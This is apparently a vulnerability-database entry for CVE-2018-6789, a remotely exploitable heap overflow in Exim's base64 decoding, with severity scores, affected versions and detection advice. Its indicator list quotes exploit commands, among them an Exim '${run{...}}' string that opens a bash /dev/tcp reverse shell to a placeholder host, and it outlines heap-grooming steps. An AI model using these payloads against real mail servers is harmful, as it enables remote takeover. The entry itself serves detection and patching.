cbcvebase.
CVE-2018-6789
published 2018-02-08

CVE-2018-6789: An issue was discovered in the base64d function in the SMTP listener in Exim before 4.90.1. By sending a handcrafted message, a buffer overflow may happen…

PriorityP196critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
KEVITWEXPLOITRansomwareInitial access
CISA Known Exploited Vulnerabilitydue 2022-05-03
Exploited in the wild
EPSS
82.24%
99.6th percentile
An issue was discovered in the base64d function in the SMTP listener in Exim before 4.90.1. By sending a handcrafted message, a buffer overflow may happen. This can be used to execute code remotely.

Affected

8 ranges
VendorProductVersion rangeFixed in
canonicalubuntu_linux
canonicalubuntu_linux
canonicalubuntu_linux
debiandebian_linux
debiandebian_linux
debiandebian_linux
debianexim4< exim4 4.90.1-1 (bookworm)exim4 4.90.1-1 (bookworm)
eximexim< 4.90.14.90.1

Detection & IOCsextracted from sources · hover to see the quote

commandAUTH PLAIN <crafted_base64_payload>
command${run{/usr/bin/setsid /bin/bash -c "/bin/bash --rcfile & /dev/tcp/<cb>/<cbport> 0>&1"}}
commandEHLO <8000-byte string>
  • Detect exploitation attempts by monitoring SMTP AUTH PLAIN commands containing crafted/malformed base64 strings (missing or manipulated padding '=' characters) sent to Exim on port 25.
  • Alert on Exim SMTP sessions where AUTH PLAIN payloads contain Exim expansion strings such as '${run{...}}' — this indicates attempt to exploit the heap overflow for RCE via ACL store block overwrite.
  • Detect oversized EHLO strings (e.g., 8000+ bytes) in SMTP sessions targeting Exim, which are used during exploitation to manipulate heap layout.
  • Monitor for SMTP sessions sending large volumes of unrecognized/garbage commands (e.g., 0xFF-byte sequences) interleaved with AUTH PLAIN, indicative of heap grooming for this exploit.
  • Identify Exim versions prior to 4.90.1 via SMTP banner grabbing; all such versions are vulnerable to CVE-2018-6789.
  • Look for reverse shell callbacks over /dev/tcp from the Exim process, as the exploit payload uses bash's /dev/tcp redirection for the callback shell.
  • ·The vulnerability is only exploitable if AUTH PLAIN (or other base64-using authentication mechanisms) is advertised/enabled in the Exim SMTP listener configuration. The exploit checks for this and aborts if not available.
  • ·The off-by-one heap overflow occurs in the base64d() function due to a miscalculated buffer length; the overwrite is triggered by sending an invalid base64 string (manipulated padding), so base64 input validation at a WAF/proxy level may reduce exposure.

CVSS provenance

nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
osv9.8CRITICAL
vulncheck9.8CRITICAL
cisa9.8CRITICAL
vendor_debian9.8CRITICAL
vendor_redhat9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.